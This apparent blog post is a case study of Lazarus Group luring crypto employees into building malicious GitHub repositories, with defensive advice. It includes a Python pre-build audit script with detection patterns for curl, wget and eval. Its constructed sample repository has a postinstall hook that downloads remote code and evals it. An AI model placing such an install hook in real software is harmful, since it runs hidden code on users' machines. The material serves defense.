How Lazarus Group Targets Crypto Companies: A Case Study
Crypto enthusiasts are likely aware that Lazarus is one of the most persistent and dangerous threat actors in the industry. They’ve caused significant damage to numerous individuals, companies, and protocols. But how exactly do they infiltrate? Let’s delve into one of their favorite methods.
Attack Method
Lazarus’s approach is alarmingly straightforward yet highly effective:
- Initial Contact: The attacker contacts an employee via social media or messaging apps.
- Bait: They direct the target to a GitHub repository for a job offer, skills test, or bug fix.
- Compromise: The individual’s device gets infected with malware.
- Access: The attacker gains entry to the company’s AWS infrastructure.
- Exploit: They then compromise the company and its users.
Real-World Example
Recently, a conversation led to over $2 million being stolen, showcasing how Lazarus operates today. Here’s a breakdown:
- Double Targeting: Two employees from the same company were contacted via LinkedIn by the same threat actor using a fake persona.
- First Employee: The attacker added the first employee to a private GitHub repo and asked them to run the build and fix an error. The device was compromised as soon as the code was built.
- Trust-Building: Despite the compromise, the attacker continued communicating, even sending $100 USDT to the employee to maintain trust.
- Switch Focus: The attacker switched to the second employee after the first moved on. This time, the repo was public, and the conversation was cut short when the employee asked about the impersonated profile.
Key Lessons
- Broad Targeting: Lazarus targets everyone, from executives to developers, across platforms such as Telegram, Discord, email, and Slack.
- Subtle Exploitation: The interactions seem benign, with theft occurring months later, making it hard to detect the initial breach.
Recommendations
To safeguard against such sophisticated attacks, consider the following:
- Eliminate Single Points of Failure: Distribute responsibilities and access.
- Use Hardware Wallets and MFA: Enhance security with physical devices.
- Avoid Running Unknown Code: Be cautious with code from unknown sources.
- Separate Devices for Communication and Crypto Access: Minimize risk exposure.
- Continuous Learning: Stay informed and educate your team regularly.
- Maintain Skepticism: Always question unexpected interactions.
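The "run the build" step in the case above is where the compromise happened, and "Avoid Running Unknown Code" is easier to follow when you can see what a build would execute before you start it. The script below is an added example, not code from the original post: it walks a checkout and lists the hooks that common toolchains run as a side effect of installing or building (npm lifecycle scripts, setup.py, Cargo build.rs, VS Code folderOpen tasks), plus any npm script you intend to invoke by name, and flags bodies that fetch or evaluate code at runtime. The "suspicious" patterns and the sample repository it builds in a temporary directory are constructed for illustration; the sample is not a real repository and the patterns are not a complete detector.

```python
"""Pre-build audit of an untrusted checkout.

Added example, not code from the original author. Before running a build you
were handed by a stranger, list everything in the repository that executes as
a side effect of the build: npm lifecycle hooks in package.json (run by
`npm install` without being asked), setup.py (run by `pip install`), Cargo
build.rs (run by `cargo build`) and VS Code tasks with runOn: folderOpen.
The "suspicious" patterns are illustrative assumptions, not a complete
detector; the point is to read the hooks before you build.
"""
import json
import os
import re
import tempfile
from dataclasses import dataclass

# Hooks npm executes automatically during `npm install`.
NPM_AUTO_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish")

# Patterns that justify reading a hook line by line before running it (assumed heuristics).
SUSPICIOUS = [
    (re.compile(r"\b(curl|wget|Invoke-WebRequest)\b"), "downloads from the network"),
    (re.compile(r"https?://"), "contains a URL"),
    (re.compile(r"\beval\b|new Function\(|child_process"), "evaluates or executes code at runtime"),
    (re.compile(r"[A-Za-z0-9+/]{80,}={0,2}"), "contains a long base64-like blob"),
]


@dataclass
class Finding:
    file: str    # path relative to the checkout root
    hook: str    # what triggers the code (e.g. "postinstall", "cargo build")
    detail: str  # why it was reported


def _flag(file, hook, trigger, body, findings):
    """Report the hook itself, then each suspicious pattern found in its body."""
    findings.append(Finding(file, hook, f"{trigger}: {body[:60]!r}"))
    for pattern, why in SUSPICIOUS:
        if pattern.search(body):
            findings.append(Finding(file, hook, why))


def _read(path):
    with open(path, encoding="utf-8", errors="replace") as fh:
        return fh.read()


def audit_repo(root, intended=()):
    """Walk the checkout; `intended` names the npm scripts you plan to run by hand."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d not in (".git", "node_modules")]
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            if name == "package.json":
                try:
                    scripts = json.loads(_read(full)).get("scripts", {})
                except (ValueError, AttributeError):
                    findings.append(Finding(rel, "package.json", "unparseable; inspect manually"))
                    continue
                for hook, body in scripts.items():
                    if hook in NPM_AUTO_HOOKS:
                        _flag(rel, hook, "runs automatically on npm install", str(body), findings)
                    elif hook in intended:
                        _flag(rel, f"npm run {hook}", "runs when you invoke it", str(body), findings)
            elif name == "setup.py":
                _flag(rel, "pip install", "runs automatically", _read(full), findings)
            elif name == "build.rs":
                _flag(rel, "cargo build", "runs automatically", _read(full), findings)
            elif name == "tasks.json" and os.path.basename(dirpath) == ".vscode":
                text = _read(full)
                if "folderOpen" in text:
                    _flag(rel, "vscode folderOpen", "runs when the folder is opened", text, findings)
    return findings


def build_sample_repo():
    """Constructed sample checkout (not a real repository): a harmless build
    script next to a postinstall hook that fetches and evaluates remote code."""
    root = tempfile.mkdtemp(prefix="audit-sample-")
    with open(os.path.join(root, "package.json"), "w", encoding="utf-8") as fh:
        json.dump({"name": "sample-skills-test", "scripts": {
            "build": "tsc -p .",
            "postinstall": "node -e \"eval(require('child_process')"
                           ".execSync('curl -s https://example.invalid/x').toString())\"",
        }}, fh)
    os.makedirs(os.path.join(root, "native"))
    with open(os.path.join(root, "native", "build.rs"), "w", encoding="utf-8") as fh:
        fh.write('fn main() { println!("cargo:rerun-if-changed=build.rs"); }\n')
    return root


if __name__ == "__main__":
    # Run the audit over the constructed sample, as if you had just cloned it.
    for f in audit_repo(build_sample_repo(), intended=("build",)):
        print(f"{f.file:18} {f.hook:16} {f.detail}")
```

Run it from the root of a fresh clone (`audit_repo(".", intended=("build",))`) before `npm install` or any build command. The design choice is that an ordinary `build` script is reported only because you said you would run it, while `postinstall` is reported unconditionally: the employee in the case above was asked to run the build, but the hooks that fire on install are the ones nobody is asked about. Treat the report as a reading list, not a verdict; a hook that downloads and evaluates code is reason enough to stop and do the work on an isolated machine.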
Conclusion
The Lazarus Group’s methods are evolving, and their attacks are increasingly sophisticated. By understanding their tactics and implementing robust security practices, you can better protect yourself and your organization from such threats. Stay vigilant, stay educated, and always be skeptical.
Stay safe and informed. 💖